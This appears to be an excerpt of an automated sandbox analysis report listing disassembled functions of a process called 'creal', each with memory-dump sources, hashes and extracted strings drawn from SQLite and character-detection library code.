                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$misuse
                                                                                                                                                                                                                • API String ID: 3510742995-1033472603
                                                                                                                                                                                                                • Opcode ID: 7b722cfd9496cf848eb8c7dd1edf231b9bdadf7ca71f36eecefc7964867b2563
                                                                                                                                                                                                                • Instruction ID: 59ed07a2b9fc50c647f6cb4f4672717d85139554c15c131a2814e0c76dd5f3fb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b722cfd9496cf848eb8c7dd1edf231b9bdadf7ca71f36eecefc7964867b2563
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3CE18721B29B6695EAA8DFA5A86437933A0FF95BC4F144135CA4E077E6CF3CE4458303
                                                                                                                                                                                                                Function 00007FF8E714F530 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$BoolCompareErr_FromLong_Object_OccurredRichSsize_t
                                                                                                                                                                                                                • String ID: ratio
                                                                                                                                                                                                                • API String ID: 2538524772-4234197119
                                                                                                                                                                                                                • Opcode ID: c6cb76a82c0156d83f652a4623d6809029c4d4441d1b486eb3f0817f7220173e
                                                                                                                                                                                                                • Instruction ID: d486d51017ad960180ee7250648dd4b0d2bdd5ace8c2b38314eee9a8fc0a4b23
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6cb76a82c0156d83f652a4623d6809029c4d4441d1b486eb3f0817f7220173e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75418C32D08792C2E6249BA5E80537D63A5AF49BE5F0C0231DE7D567A5EF3CE4818742
                                                                                                                                                                                                                Function 00007FF8E7146820 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'SuspiciousRange' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'SuspiciousRange' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-3882440367
                                                                                                                                                                                                                • Opcode ID: edf70cb319030b3d86d441b19e0745afc740f480ca4045dac8bdcfc512da58eb
                                                                                                                                                                                                                • Instruction ID: c6bb9082a5c29550de0c00d578cd2542ed7b3e9b38bef6b424fc82bc383077d6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: edf70cb319030b3d86d441b19e0745afc740f480ca4045dac8bdcfc512da58eb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56317E61F08742C1EA589BA5E8953BC23A0AF44BD8F584131DA7D477E9EE2CE4948702
                                                                                                                                                                                                                Function 00007FF8E7147020 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'SuperWeirdWordPlugin' object attribute '_word_count' cannot be deleted$attribute '_word_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-1212817586
                                                                                                                                                                                                                • Opcode ID: 16b82e3689da71a62fdb9f4fcb28de3a703054875de315429c3694e8e6cd4c3d
                                                                                                                                                                                                                • Instruction ID: f8d638e825f6feda4b1e73d30f5e9061ddd8ebe4eb073817c5a631aec7fcc056
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16b82e3689da71a62fdb9f4fcb28de3a703054875de315429c3694e8e6cd4c3d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2831AE61F08742C1EE589BA9E8993BC23A0EF45BD4F585131DA3E477D5EE2CE484D702
                                                                                                                                                                                                                Function 00007FF8E7147860 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'SuperWeirdWordPlugin' object attribute '_buffer_accent_count' cannot be deleted$attribute '_buffer_accent_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-76466605
                                                                                                                                                                                                                • Opcode ID: 20ea869bad6b8ed73006467498f91221eb8f9dd8b91723df2faa57ca20f3ad29
                                                                                                                                                                                                                • Instruction ID: 745a1e3520f2455e7f7d672292a545d274b16008a711b390f57162b468ba94d8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20ea869bad6b8ed73006467498f91221eb8f9dd8b91723df2faa57ca20f3ad29
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B31AE71B08743C1EA589BA5E8953BD23A1EF84BE4F584131DA7E477D5EE2CE484C702
                                                                                                                                                                                                                Function 00007FF8E7145870 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'TooManyAccentuatedPlugin' object attribute '_accentuated_count' cannot be deleted$attribute '_accentuated_count' of 'TooManyAccentuatedPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-3693778415
                                                                                                                                                                                                                • Opcode ID: 7f11271614b407e1cd5d041de6a849fa1ce6af29865a2d7861870a54299a5fe4
                                                                                                                                                                                                                • Instruction ID: 28ae93271a77c00624205ce6cc85acb82c876864513ad4595afa034ee80a4cf2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f11271614b407e1cd5d041de6a849fa1ce6af29865a2d7861870a54299a5fe4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B831A061F08743C2EA589BA5E89537C23A0AF44BE4F584131EA7E477E5EE2CE4849702
                                                                                                                                                                                                                Function 00007FF8E7148470 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • attribute '_successive_upper_lower_count' of 'ArchaicUpperLowerPlugin' undefined, xrefs: 00007FF8E7148488
                                                                                                                                                                                                                • int, xrefs: 00007FF8E7148586
                                                                                                                                                                                                                • 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count' cannot be deleted, xrefs: 00007FF8E71484FC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count' cannot be deleted$attribute '_successive_upper_lower_count' of 'ArchaicUpperLowerPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-634379450
                                                                                                                                                                                                                • Opcode ID: 3342e34050822ecdd092d2c1701ec675c9b80d10f8f017621af40ec443b25660
                                                                                                                                                                                                                • Instruction ID: 8fe8f84a0b659ec1e14122d1f681cae119eaf08f52d7342108a2ab38a67ff8e1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3342e34050822ecdd092d2c1701ec675c9b80d10f8f017621af40ec443b25660
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9317E71F08742C5EB589BA9E4953BC23A0EF44BE4F585131DA3D4A7D5EE2CE4948702
                                                                                                                                                                                                                Function 00007FF8E7147640 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'SuperWeirdWordPlugin' object attribute '_bad_character_count' cannot be deleted$attribute '_bad_character_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-2709777744
                                                                                                                                                                                                                • Opcode ID: 610f13cc42156de412b3f6d1ccc7dde81ee8bb81fe19c5e5436d4dfc6cd023cb
                                                                                                                                                                                                                • Instruction ID: 9ccb20b50ce4c3742ec46914fb67d0e483f1fe5d25f347fd48969ba83d2f7ad5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 610f13cc42156de412b3f6d1ccc7dde81ee8bb81fe19c5e5436d4dfc6cd023cb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1319C71B08742D2EA589BA9E4953BC23A1BF44BD4F984131DA3E477E4FE2CE4948702
                                                                                                                                                                                                                Function 00007FF8E71472A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'SuperWeirdWordPlugin' object attribute '_foreign_long_count' cannot be deleted$attribute '_foreign_long_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-3135691889
                                                                                                                                                                                                                • Opcode ID: 35cb3d4f2bd9c4a5d37c2cde372bddb3ca93a0b263ca3f3a2d664a0bc4599930
                                                                                                                                                                                                                • Instruction ID: cb701b0dc4bbe3d2ba7dfb73736a6b4398430261471236dd0f6d7e598cc4397d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35cb3d4f2bd9c4a5d37c2cde372bddb3ca93a0b263ca3f3a2d664a0bc4599930
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27318172F08B42C1EA589BA5E49537C23A1EF88BD4F584131DA7E477D5EE2CE484C702
                                                                                                                                                                                                                Function 00007FF8E7148CA0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'ArabicIsolatedFormPlugin' object attribute '_isolated_form_count' cannot be deleted$attribute '_isolated_form_count' of 'ArabicIsolatedFormPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-4047731557
                                                                                                                                                                                                                • Opcode ID: 1ec334efbc93af8a0daa537c9c947367f6496fe570f3d383ebc24800b9db443f
                                                                                                                                                                                                                • Instruction ID: 6e4a5469e3e9e49c768155005f6bd76862a4753d6791c33e81b28ee0691371cb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ec334efbc93af8a0daa537c9c947367f6496fe570f3d383ebc24800b9db443f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89319071B19742C1EF589BA9E4953BC23A0BF54BD4F584131DA7E477E4EE2CE4848702
                                                                                                                                                                                                                Function 00007FF8E7144EB0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • 'TooManySymbolOrPunctuationPlugin' object attribute '_punctuation_count' cannot be deleted, xrefs: 00007FF8E7144F3C
                                                                                                                                                                                                                • int, xrefs: 00007FF8E7144FC6
                                                                                                                                                                                                                • attribute '_punctuation_count' of 'TooManySymbolOrPunctuationPlugin' undefined, xrefs: 00007FF8E7144EC8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_punctuation_count' cannot be deleted$attribute '_punctuation_count' of 'TooManySymbolOrPunctuationPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-1459665959
                                                                                                                                                                                                                • Opcode ID: 524d028e614f50b41909a65e2b05ff1c14cbdfe08726ae935d08e3c758078267
                                                                                                                                                                                                                • Instruction ID: e4fde9b45425ac1073ddfcc91621c5fb6d8d28152cd2e4212c5a3e5f1b865ce6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 524d028e614f50b41909a65e2b05ff1c14cbdfe08726ae935d08e3c758078267
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1319E31F08742C1EA589BA9E4953BC63A2EF84BD4F584131DA3D467D5EE2CE486D702
                                                                                                                                                                                                                Function 00007FF8E7147C80 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'CjkInvalidStopPlugin' object attribute '_cjk_character_count' cannot be deleted$attribute '_cjk_character_count' of 'CjkInvalidStopPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-399339277
                                                                                                                                                                                                                • Opcode ID: f2c272c237092df4c159db7bbb8ebb4d417ee1358fd08bf9141b406699d39ed6
                                                                                                                                                                                                                • Instruction ID: af688869a8576db61c84db8fb7ba1bfd37a65fea1abb77c0dfa0af51aeed4ec1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2c272c237092df4c159db7bbb8ebb4d417ee1358fd08bf9141b406699d39ed6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3318071F18B42C1EE589BA5E4953BC23A1EF84BD4F584131DA7E477E5EE2CE4848702
                                                                                                                                                                                                                Function 00007FF8E7145C90 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'UnprintablePlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'UnprintablePlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-2596148235
                                                                                                                                                                                                                • Opcode ID: 073f5d8d8577f69fc90c9a8fdde1e95b02313488756eee5ef187c2381a1a2916
                                                                                                                                                                                                                • Instruction ID: 0dda5a1b1de7fef0811a8b7b90b05432ff5ffff43823cf2e345df87f22b427c7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 073f5d8d8577f69fc90c9a8fdde1e95b02313488756eee5ef187c2381a1a2916
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E31C171F08742C2EE589BA5E8993BC23A0EF44BD4F584130DA7E477E4EE2CE4849302
                                                                                                                                                                                                                Function 00007FF8E71466E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • 'SuspiciousRange' object attribute '_suspicious_successive_range_count' cannot be deleted, xrefs: 00007FF8E714676C
                                                                                                                                                                                                                • int, xrefs: 00007FF8E71467F6
                                                                                                                                                                                                                • attribute '_suspicious_successive_range_count' of 'SuspiciousRange' undefined, xrefs: 00007FF8E71466F8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'SuspiciousRange' object attribute '_suspicious_successive_range_count' cannot be deleted$attribute '_suspicious_successive_range_count' of 'SuspiciousRange' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-916769388
                                                                                                                                                                                                                • Opcode ID: 32c8cc5da1c5a4c53662f2a02eb56b9d7fcea26900f0b6a46b27aacae368bd4d
                                                                                                                                                                                                                • Instruction ID: f6a5ebd291f57371973bffe6e189bd24ebd0ffb95046254a3071c4a87343dca1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32c8cc5da1c5a4c53662f2a02eb56b9d7fcea26900f0b6a46b27aacae368bd4d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7318E71B08742C1EE589BA9E4953BD23A0FF84BD9F584131DA3D467D9EE2CE885C702
                                                                                                                                                                                                                Function 00007FF8E71486F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'ArchaicUpperLowerPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'ArchaicUpperLowerPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-4184598959
                                                                                                                                                                                                                • Opcode ID: 342a4cd3f7d259d24aeb9a776a1e708ee513c6b05d4146dbb2a3107d3dc6b54c
